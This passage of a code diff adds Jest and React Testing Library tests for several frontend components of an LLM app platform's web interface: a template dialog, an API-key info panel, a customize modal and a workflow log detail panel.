+      expect(screen.getByTestId('app-list')).toBeInTheDocument()
+      expect(screen.getByTestId('app-list-success')).toBeInTheDocument()
+    })
+
+    it('should call both onSuccess and onClose when app list success is triggered', () => {
+      const mockOnSuccess = jest.fn()
+      const mockOnClose = jest.fn()
+      render(<CreateAppTemplateDialog {...defaultProps} show onSuccess={mockOnSuccess} onClose={mockOnClose} />)
+
+      fireEvent.click(screen.getByTestId('app-list-success'))
+
+      expect(mockOnSuccess).toHaveBeenCalledTimes(1)
+      expect(mockOnClose).toHaveBeenCalledTimes(1)
+    })
+
+    it('should call onCreateFromBlank when create from blank is clicked', () => {
+      const mockOnCreateFromBlank = jest.fn()
+      render(<CreateAppTemplateDialog {...defaultProps} show onCreateFromBlank={mockOnCreateFromBlank} />)
+
+      fireEvent.click(screen.getByTestId('create-from-blank'))
+
+      expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1)
+    })
+  })
+
+  describe('useKeyPress Integration', () => {
+    it('should set up ESC key listener when modal is shown', () => {
+      const { useKeyPress } = require('ahooks')
+
+      render(<CreateAppTemplateDialog {...defaultProps} show />)
+
+      expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function))
+    })
+
+    it('should handle ESC key press to close modal', () => {
+      const { useKeyPress } = require('ahooks')
+      let capturedCallback: (() => void) | undefined
+
+      useKeyPress.mockImplementation((key: string, callback: () => void) => {
+        if (key 
=== 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + expect(capturedCallback).toBeDefined() + expect(typeof capturedCallback).toBe('function') + + // Simulate ESC key press + capturedCallback?.() + + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when ESC key is pressed and modal is not shown', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + // The callback should still be created but not execute onClose + expect(capturedCallback).toBeDefined() + + // Simulate ESC key press + capturedCallback?.() + + // onClose should not be called because modal is not shown + expect(mockOnClose).not.toHaveBeenCalled() + }) + }) + + describe('Callback Dependencies', () => { + it('should create stable callback reference for ESC key handler', () => { + const { useKeyPress } = require('ahooks') + + render() + + // Verify that useKeyPress was called with a function + const calls = useKeyPress.mock.calls + expect(calls.length).toBeGreaterThan(0) + expect(calls[0][0]).toBe('esc') + expect(typeof calls[0][1]).toBe('function') + }) + }) + + describe('Edge Cases', () => { + it('should handle null props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle undefined props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle rapid show/hide toggles', () => { + // Test initial state + const { unmount } = render() + unmount() + + // Test show state + render() + expect(screen.getByRole('dialog')).toBeInTheDocument() + + // Test hide state + render() + // Due to transition animations, we just verify the component handles the prop change + expect(() => render()).not.toThrow() + }) + + it('should handle missing optional onCreateFromBlank prop', () => { + const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + + it('should work with all required props only', () => { + const requiredProps = { + show: true, + onSuccess: jest.fn(), + onClose: jest.fn(), + } + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx new file mode 100644 index 0000000000..1b1e729546 --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx @@ -0,0 +1,209 @@ +import type { RenderOptions } from '@testing-library/react' +import { fireEvent, render } from '@testing-library/react' +import { defaultPlan } from '@/app/components/billing/config' +import { noop } from 'lodash-es' +import type { ModalContextState } from '@/context/modal-context' +import APIKeyInfoPanel from './index' + +// Mock the modules before importing the functions +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + 
useModalContext: jest.fn(), +})) + +import { useProviderContext as actualUseProviderContext } from '@/context/provider-context' +import { useModalContext as actualUseModalContext } from '@/context/modal-context' + +// Type casting for mocks +const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction +const mockUseModalContext = actualUseModalContext as jest.MockedFunction + +// Default mock data +const defaultProviderContext = { + modelProviders: [], + refreshModelProviders: noop, + textGenerationModelList: [], + supportRetrievalMethods: [], + isAPIKeySet: false, + plan: defaultPlan, + isFetchedPlan: false, + enableBilling: false, + onPlanInfoChanged: noop, + enableReplaceWebAppLogo: false, + modelLoadBalancingEnabled: false, + datasetOperatorEnabled: false, + enableEducationPlan: false, + isEducationWorkspace: false, + isEducationAccount: false, + allowRefreshEducationVerify: false, + educationAccountExpireAt: null, + isLoadingEducationAccountInfo: false, + isFetchingEducationAccountInfo: false, + webappCopyrightEnabled: false, + licenseLimit: { + workspace_members: { + size: 0, + limit: 0, + }, + }, + refreshLicenseLimit: noop, + isAllowTransferWorkspace: false, + isAllowPublishAsCustomKnowledgePipelineTemplate: false, +} + +const defaultModalContext: ModalContextState = { + setShowAccountSettingModal: noop, + setShowApiBasedExtensionModal: noop, + setShowModerationSettingModal: noop, + setShowExternalDataToolModal: noop, + setShowPricingModal: noop, + setShowAnnotationFullModal: noop, + setShowModelModal: noop, + setShowExternalKnowledgeAPIModal: noop, + setShowModelLoadBalancingModal: noop, + setShowOpeningModal: noop, + setShowUpdatePluginModal: noop, + setShowEducationExpireNoticeModal: noop, + setShowTriggerEventsLimitModal: noop, +} + +export type MockOverrides = { + providerContext?: Partial + modalContext?: Partial +} + +export type APIKeyInfoPanelRenderOptions = { + mockOverrides?: MockOverrides +} & Omit + +// Setup function to configure mocks +export function setupMocks(overrides: MockOverrides = {}) { + mockUseProviderContext.mockReturnValue({ + ...defaultProviderContext, + ...overrides.providerContext, + }) + + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + ...overrides.modalContext, + }) +} + +// Custom render function +export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) { + const { mockOverrides, ...renderOptions } = options + + setupMocks(mockOverrides) + + return render(, renderOptions) +} + +// Helper functions for common test scenarios +export const scenarios = { + // Render with API key not set (default) + withAPIKeyNotSet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: false }, + ...overrides, + }, + }), + + // Render with API key already set + withAPIKeySet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: true }, + ...overrides, + }, + }), + + // Render with mock modal function + withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal }, + ...overrides, + }, + }), +} + +// Common test assertions +export const assertions = { + // Should render main button + shouldRenderMainButton: () => { + const button = document.querySelector('button.btn-primary') + expect(button).toBeInTheDocument() + return button + }, + + // 
Should not render at all + shouldNotRender: (container: HTMLElement) => { + expect(container.firstChild).toBeNull() + }, + + // Should have correct panel styling + shouldHavePanelStyling: (panel: HTMLElement) => { + expect(panel).toHaveClass( + 'border-components-panel-border', + 'bg-components-panel-bg', + 'relative', + 'mb-6', + 'rounded-2xl', + 'border', + 'p-8', + 'shadow-md', + ) + }, + + // Should have close button + shouldHaveCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + expect(closeButton).toBeInTheDocument() + expect(closeButton).toHaveClass('cursor-pointer') + return closeButton + }, +} + +// Common user interactions +export const interactions = { + // Click the main button + clickMainButton: () => { + const button = document.querySelector('button.btn-primary') + if (button) fireEvent.click(button) + return button + }, + + // Click the close button + clickCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + if (closeButton) fireEvent.click(closeButton) + return closeButton + }, +} + +// Text content keys for assertions +export const textKeys = { + selfHost: { + titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/, + titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + tryCloud: /appOverview\.apiKeyInfo\.tryCloud/, + }, + cloud: { + trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/, + trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + }, +} + +// Setup and cleanup utilities +export function clearAllMocks() { + jest.clearAllMocks() +} + +// Export mock functions for external access +export { mockUseProviderContext, mockUseModalContext, defaultModalContext } diff --git a/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx new file mode 100644 index 0000000000..c7cb061fde --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx @@ -0,0 +1,122 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for Cloud edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: false, // Test Cloud edition +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Cloud Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Cloud Edition Content', () => { + it('should display cloud version 
title', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument() + }) + + it('should display emoji for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀') + }) + + it('should display cloud version description', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument() + }) + + it('should not render external link for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument() + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.spec.tsx b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx new file mode 100644 index 0000000000..62eeb4299e --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx @@ -0,0 +1,162 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for CE edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: true, // Test CE edition by default +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Community Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + 
assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Content Display', () => { + it('should display self-host title content', () => { + scenarios.withAPIKeyNotSet() + + expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument() + expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument() + }) + + it('should render external link with correct href for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toBeInTheDocument() + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveTextContent(textKeys.selfHost.tryCloud) + }) + + it('should have external link with proper styling for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toHaveClass( + 'mt-2', + 'flex', + 'h-[26px]', + 'items-center', + 'space-x-1', + 'p-1', + 'text-xs', + 'font-medium', + 'text-[#155EEF]', + ) + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('State Management', () => { + it('should start with visible panel (isShow: true)', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should toggle visibility when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Edge Cases', () => { + it('should handle provider context loading state', () => { + scenarios.withAPIKeyNotSet({ + providerContext: { + modelProviders: [], + textGenerationModelList: [], + }, + }) + assertions.shouldRenderMainButton() + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + 
scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + }) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + 
expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toBeInTheDocument() + expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + 
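+    // Chat-style modes (chat, advanced-chat) resolve to the webapp-conversation
+    // starter repo; completion, workflow and agent-chat resolve to
+    // webapp-text-generator, as the remaining cases verify.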
it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) + + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) 
+ expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum diff --git a/web/app/components/app/workflow-log/detail.spec.tsx b/web/app/components/app/workflow-log/detail.spec.tsx new file mode 100644 index 0000000000..b594be5f04 --- /dev/null +++ b/web/app/components/app/workflow-log/detail.spec.tsx @@ -0,0 +1,319 @@ +/** + * DetailPanel Component Tests + * + * Tests the 
workflow run detail panel which displays: + * - Workflow run title + * - Replay button (when canReplay is true) + * - Close button + * - Run component with detail/tracing URLs + */ + +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DetailPanel from './detail' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock the Run component as it has complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
+      <div data-testid="workflow-run">
+        <span data-testid="run-detail-url">{runDetailUrl}</span>
+        <span data-testid="tracing-list-url">{tracingListUrl}</span>
+      </div>
+ ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
<div data-testid="workflow-context-provider">{children}</div>
